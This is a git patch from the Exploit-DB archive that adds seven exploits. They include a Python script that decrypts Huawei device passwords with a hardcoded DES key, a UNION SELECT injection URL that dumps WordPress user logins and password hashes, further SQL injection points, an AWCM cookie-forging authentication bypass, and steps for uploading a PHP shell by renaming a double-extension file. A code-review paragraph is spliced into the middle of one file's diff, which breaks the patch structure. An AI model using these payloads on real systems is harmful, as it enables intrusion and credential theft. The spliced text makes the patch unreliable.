From b0a05de4d08b61f8efd2b10b8b87a994d5b90ebc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 31 Aug 2015 05:02:11 +0000
Subject: [PATCH] DB: 2015-08-31 7 new exploits
---
 files.csv | 7 ++++
 platforms/hardware/remote/38020.py | 63 ++++++++++++++++++++++++++++
 platforms/multiple/webapps/38016.txt | 9 ++++
 platforms/php/webapps/37998.txt | 36 ++++++++++++++++
 platforms/php/webapps/38015.txt | 22 ++++++++++
 platforms/php/webapps/38017.txt | 8 ++++
 platforms/php/webapps/38018.txt | 7 ++++
 platforms/php/webapps/38019.txt | 7 ++++
 8 files changed, 159 insertions(+)
 create mode 100755 platforms/hardware/remote/38020.py
 create mode 100755 platforms/multiple/webapps/38016.txt
 create mode 100755 platforms/php/webapps/37998.txt
 create mode 100755 platforms/php/webapps/38015.txt
 create mode 100755 platforms/php/webapps/38017.txt
 create mode 100755 platforms/php/webapps/38018.txt
 create mode 100755 platforms/php/webapps/38019.txt
diff --git a/files.csv b/files.csv
index d36090a40..fb221f3c7 100755
--- a/files.csv
+++ b/files.csv
@@ -34311,6 +34311,7 @@ id,file,description,date,author,platform,type,port
 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0
 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0
 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
+37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
 38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
@@ -34324,3 +34325,9 @@ id,file,description,date,author,platform,type,port
 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
+38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
+38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
+38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0
+38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
+38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
+38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
diff --git a/platforms/hardware/remote/38020.py b/platforms/hardware/remote/38020.py
new file mode 100755
index 000000000..27489bb39
--- /dev/null
+++ b/platforms/hardware/remote/38020.py
@@ -0,0 +1,63 @@
+source: http://www.securityfocus.com/bid/56510/info
+
+Multiple Huawei products are prone to a weak password encryption weakness.
+
+Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks.
+
+The following are vulnerable:
+
+Huawei Quidway series
+Huawei CX600 V600R001
+Huawei CX600 V600R003C00SPC900
+Huawei ME60 V600R002C07 and prior versions
+AR 19/29/49 R2207 and prior versions
+
+from Crypto.Cipher import DES
+
+def decode_char(c):
+ if c == 'a':
+ r = '?'
+ else:
+ r = c
+ return ord(r) - ord('!')
+
+def ascii_to_binary(s):
+ assert len(s) == 24
+
+ out = [0]*18
+ i = 0
+ j = 0
+
+ for i in range(0, len(s), 4):
+ y = decode_char(s[i + 0])
+ y = (y << 6) & 0xffffff
+
+ k = decode_char(s[i + 1])
+ y = (y | k) & 0xffffff
+ y = (y << 6) & 0xffffff
+
+ k = decode_char(s[i + 2])
+ y = (y | k) & 0xffffff
+ y = (y << 6) & 0xffffff
+
+ k = decode_char(s[i + 3])
+ y = (y | k) & 0xffffff
+
+ out[j+2] = chr(y & 0xff)
+ out[j+1] = chr((y>>8) & 0xff)
+ out[j+0] = chr((y>>16) & 0xff)
+
+ j += 3
+
+ return "".join(out)
+
+def decrypt_password(p):
+ r = ascii_to_binary(p)
+
+ r = r[:16]
+
+ d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
+ r = d.decrypt(r)
+
+ return r.rstrip("\x00")
+
diff --git a/platforms/multiple/webapps/38016.txt b/platforms/multiple/webapps/38016.txt
new file mode 100755
index 000000000..dace94563
--- /dev/null
+++ b/platforms/multiple/webapps/38016.txt
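Review bot: The advisory text at the top of the hunk (`+source: http://www.securityfocus.com/bid/56510/info` through `+AR 19/29/49 R2207 and prior versions`) is not commented out, so the file as committed does not parse as Python; prefix those lines with `#` or wrap them in a module docstring. In `ascii_to_binary`, `assert len(s) == 24` is stripped under `-O` and should be an explicit check, `if len(s) != 24: raise ValueError("expected 24 encoded characters")`. The code also uses `str` as a byte buffer (`chr()` results joined into `out`, a `str` DES key, `rstrip("\x00")`), which only works on Python 2; a one-line note such as `# Python 2 only: str doubles as the byte buffer handed to DES` would save the next reader a port attempt. `decrypt_password` silently discards the last two decoded bytes via `r[:16]`; a comment saying what those trailing bytes are (presumably padding, but that is not evident from the code) would help.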
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56474/info
+
+ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects
\ No newline at end of file
diff --git a/platforms/php/webapps/37998.txt b/platforms/php/webapps/37998.txt
new file mode 100755
index 000000000..93a94c337
--- /dev/null
+++ b/platforms/php/webapps/37998.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Wordpress Responsive Thumbnail Slider Arbitrary File Upload
+# Date: 2015/8/29
+# Exploit Author: Arash Khazaei
+# Vendor Homepage:
+https://wordpress.org/plugins/wp-responsive-thumbnail-slider/
+# Software Link:
+https://downloads.wordpress.org/plugin/wp-responsive-thumbnail-slider.zip
+# Version: 1.0
+# Tested on: Kali , Iceweasel Browser
+# CVE : N/A
+# Contact : http://twitter.com/0xClay
+# Email : 0xclay@gmail.com
+# Site : http://bhunter.ir
+
+# Intrduction :
+
+# Wordpress Responsive Thumbnail Slider Plugin iS A With 6000+ Active
+Install
+# And Suffer From A File Upload Vulnerability Allow Attacker Upload Shell
+As A Image .
+# Authors , Editors And Of Course Administrators This Vulnerability To Harm
+WebSite .
+
+# POC :
+
+# For Exploiting This Vulnerability :
+
+# Go To Add Image Section And Upload File By Self Plugin Uploader
+# Then Upload File With Double Extension Image
+# And By Using A BurpSuite Or Tamper Data Change The File Name From
+Shell.php.jpg To Shell.php
+# And Shell Is Uploaded . :)
+
+
+
+
diff --git a/platforms/php/webapps/38015.txt b/platforms/php/webapps/38015.txt
new file mode 100755
index 000000000..a59c75ec2
--- /dev/null
+++ b/platforms/php/webapps/38015.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/56465/info
+
+AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
+
+Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
+
+AWCM 2.2 is vulnerable; other versions may also be affected.
+
+Authentication Bypass:
+
+http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
+ex) http://targethost/awcm/cookie_gen.php?
+name=awcm_member&content=123456
+
+Security Bypass:
+
+[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
+method=\"post\"]
+[input type=\"hidden\" name=\"coment\" value=\'insert
+uninvited comments 2\' /]
+[input type=\"submit\" value=\"Submit\"]
+
diff --git a/platforms/php/webapps/38017.txt b/platforms/php/webapps/38017.txt
new file mode 100755
index 000000000..71afdae24
--- /dev/null
+++ b/platforms/php/webapps/38017.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/56477/info
+
+The Kakao theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
+
diff --git a/platforms/php/webapps/38018.txt b/platforms/php/webapps/38018.txt
new file mode 100755
index 000000000..6d9b0c991
--- /dev/null
+++ b/platforms/php/webapps/38018.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56478/info
+
+The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/38019.txt b/platforms/php/webapps/38019.txt
new file mode 100755
index 000000000..2ed7fd41e
--- /dev/null
+++ b/platforms/php/webapps/38019.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56479/info
+
+The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]
\ No newline at end of file